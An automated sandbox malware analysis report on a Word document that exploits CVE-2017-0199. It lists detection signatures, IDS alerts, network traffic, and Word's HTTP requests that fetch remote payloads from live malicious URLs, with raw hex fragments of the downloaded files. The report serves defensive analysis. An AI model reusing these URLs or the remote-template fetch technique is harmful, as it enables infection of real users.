Edit tour

Windows Analysis Report
_________19.03.docx

Overview

General Information

Sample name:_________19.03.docx
Analysis ID:1668984
MD5:f9026fabfb8d131863ad06fd72eb2717
SHA1:ffa14e589d99a95d025b0ae5d7122319195622f7
SHA256:4640c58e3c658d8178f4e9d9570566040ad162e25b61a46b0be989aeb69db679
Tags:cve-2017-0199docxuser-zhuzhu0009
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • WINWORD.EXE (PID: 7720 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49716, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7720, Protocol: tcp, SourceIp: 91.218.228.26, SourceIsIpv6: false, SourcePort: 80
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-19T02:44:47.340125+020020338581Malware Command and Control Activity Detected192.168.2.44973591.218.228.2680TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-19T02:44:46.343974+020020550801Malware Command and Control Activity Detected192.168.2.44973491.218.228.2680TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-19T02:44:43.229507+020028000291Attempted User Privilege Gain91.218.228.2680192.168.2.449726TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-19T02:44:40.837742+020018100051Potentially Bad Traffic192.168.2.44971991.218.228.2680TCP
2025-04-19T02:44:45.155817+020018100051Potentially Bad Traffic192.168.2.44973191.218.228.2680TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://clack.su/fox.docxAvira URL Cloud: Label: malware
Source: http://valisi.ru/first.rtfAvira URL Cloud: Label: malware
Source: _________19.03.docxVirustotal: Detection: 44%Perma Link
Source: _________19.03.docxReversingLabs: Detection: 41%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: global trafficDNS query: name: clack.su
Source: global trafficDNS query: name: clack.su
Source: global trafficDNS query: name: valisi.ru
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global trafficTCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global trafficTCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global trafficTCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global trafficTCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global trafficTCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global trafficTCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80

Networking

barindex
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49731 -> 91.218.228.26:80
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49719 -> 91.218.228.26:80
Source: Network trafficSuricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.4:49735 -> 91.218.228.26:80
Source: Network trafficSuricata IDS: 2055080 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M3, Microsoft Word UA Request for .rtf : 192.168.2.4:49734 -> 91.218.228.26:80
Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 91.218.228.26:80 -> 192.168.2.4:49726
Source: Joe Sandbox ViewASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
Source: global trafficHTTP traffic detected: GET /fox.docx HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: clack.suConnection: Keep-AliveCookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
Source: global trafficHTTP traffic detected: GET /first.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: valisi.ruConnection: Keep-AliveCookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.documentlast-modified: Wed, 19 Mar 2025 11:29:09 GMTetag: "6eac-67daaa85-b8348916368e5d6e;;;"accept-ranges: bytescontent-length: 28332date: Sat, 19 Apr 2025 00:44:42 GMTserver: LiteSpeedData Raw: 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 1e 91 1a b7 ea 00 00 00 4e 02 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 92 51 4b c4 30 0c 80 df 05 ff 43 c9 fb 2d bb 13 44 e4 ba 7b 11 e1 de 44 e6 0f 08 6d b6 95 db da d2 46 bd fb f7 56 50 74 70 9e 7b 6c 9a 7c f9 12 b2 dd 1d a7 51 bd 71 ca 2e 78 0d eb aa 06 c5 de 04 eb 7c af e1 a5 7d 5c dd 81 ca 42 de d2 18 3c 6b 38 71 86 5d 73 7d b5 7d e6 91 a4 14 e5 c1 c5 ac 0a c5 67 0d 83 48 bc 47 cc 66 e0 89 72 15 22 fb f2 d3 85 34 91 94 67 ea 31 92 39 50 cf b8 a9 eb 5b 4c bf 19 d0 cc 98 6a 6f 35 a4 bd bd 01 d5 9e 22 2f 61 87 ae 73 86 1f 82 79 9d d8 cb 99 16 c8 47 61 6f d9 ae 62 2a f5 49 5c 99 46 b5 94 7a 16 0d 36 98 a7 12 ce 48 31 56 05 0d 78 de 68 b3 dc e8 ef 69 71 62 21 4b 42 68 42 e2 cb 3e 9f 19 97 84 d6 cb 85 fe 5f d1 3c e3 c7 e6 3d 24 8b f6 2b fc 6d 83 b3 2b 68 3e 00 50 4b 03 04 14 00 00 00 00 00 d9 41 73 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 5f 72 65 6c 73 2f 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 74 3f 39 7a bc 00 00 00 28 01 00 00 1e 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 5f 72 65 6c 73 2f 69 74 65 6d 31 2e 78 6d 6c 2e 72 65 6c 73 8d cf b1 8a c3 30 0c 06 e0 fd e0 de c1 68 6f 9c dc 50 ca 11 a7 4b 29 74 3b 4a 0e ba 1a 47 49 4c 63 cb 58 6a 69 df be e6 a6 2b 74 e8 28 89 ff fb 51 bb bd 85 45 5d 31 b3 a7 68 a0 a9 6a 50 18 1d 0d 3e 4e 06 7e fb fd 6a 03 8a c5 c6 c1 2e 14 d1 c0 1d 19 b6 dd e7 47 7b c4 c5 4a 09 f1 ec 13 ab a2 44 36 30 8b a4 6f ad d9 cd 18 2c 57 94 30 96 cb 48 39 58 29 63 9e 74 b2 ee 6c 27 d4 5f 75 bd d6 f9 bf 01 dd 93 a9 0e 83 81 7c 18 1a 50 fd 3d e1 3b 36 8d a3 77 b8 23 77 09 18 e5 45 85 76 17 16 0a a7 b0 fc 64 2a 8d aa b7 79 42 31 e0 05 c3 df aa a9 8a 09 ba 6b f5 d3 7f dd 03 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 26 9a f9 f2 c3 00 00 00 80 01 00 00 13 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 69 74 65 6d 31 2e 78 6d 6c a5 90 c1 0a c2 30 0c 86 5f 65 f4 ee 3a 3d a9 6c f3 22 9e 14 04 15 cf a1 cb b4 b0 36 a5 c9 44 df de aa 13 c4 83 17 2f 39 7c f9 f9 f2 93 72 71 75 5d 76 c1 c8 96 7c a5 c6 79 a1 32 f4 86 1a eb 4f 95 3a ec 57 a3 a9 ca 58 c0 37 d0 91 c7 4a dd 90 d5 a2 2e a9 17 9e a7 b1 0b 60 70 09 02 59 f2 f8 27 e2 4a 9d 45 c2 5c 6b 36 67 74 c0 b9 b3 26 12 53 2b b9 21 a7 a9 6d ad 41 3d 29 8a 99 7e c4 1f 06 ed 50 a0 49 1a 35 a8 23 76 20 d8 24 33 b2 fe 62 64 7a 87 5e be f9 16 29 74 98 60 88 14 30 ca 6d 33 38 d7 96 e5 55 ef af 66 ef 73 86 62 ec 83 bc ed 47 e0 35 b1 d4 12 7b 2c f5 af c4 b0 fd fc 5a 7d 07 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 15 aa 19 12 e7 00 00 00 4d 01 00 00 18 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 69 74 65 6d 50 72 6f 70 73 31 2e 78 6d 6c 65 90 41 6b 84 30 10 85 ef 85 fe 07 c9
Source: global trafficHTTP traffic detected: GET /fox.docx HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: clack.suConnection: Keep-AliveCookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
Source: global trafficHTTP traffic detected: GET /first.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: valisi.ruConnection: Keep-AliveCookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
Source: global trafficDNS traffic detected: DNS query: clack.su
Source: global trafficDNS traffic detected: DNS query: valisi.ru
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/5.4.45set-cookie: wfvt_1026485859=6802f1fe1a5cc; expires=Sat, 19-Apr-2025 01:14:46 GMT; path=/; httponlycontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachelink: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"date: Sat, 19 Apr 2025 00:44:46 GMTserver: LiteSpeed
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/5.4.45set-cookie: wfvt_1026485859=6802f1ff2de53; expires=Sat, 19-Apr-2025 01:14:47 GMT; path=/; httponlycontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachelink: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 19 Apr 2025 00:44:47 GMTserver: LiteSpeedData Raw: 63 31 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db ca f1 d9 fe 8a 15 0b 58 e4 09 c5 8b 44 59 8e 6c da 50 64 1b 0d 9a 34 41 ec 83 a2 b0 0d 61 4d ae a4 75 28 92 67 b9 b2 2c d8 02 8a 3e f4 3f fa 07 79 e8 01 da 87 fe 83 cf 1f 75 76 97 94 a8 8b 13 fb 24 28 60 53 e4 5e e6 3e b3 33 b3 07 95 e3 0f dd f3 bf 7e 3c 41 43 3e 8a 0e b7 0f c4 0f 8a 70 3c f0 35 36 d6 c4 00 c1 e1 e1 f6 d6 c1 88 70 8c 82 21 66 19 e1 be f6 f3 f9 69 6d 0f a6 f3 f1 18 8f 88 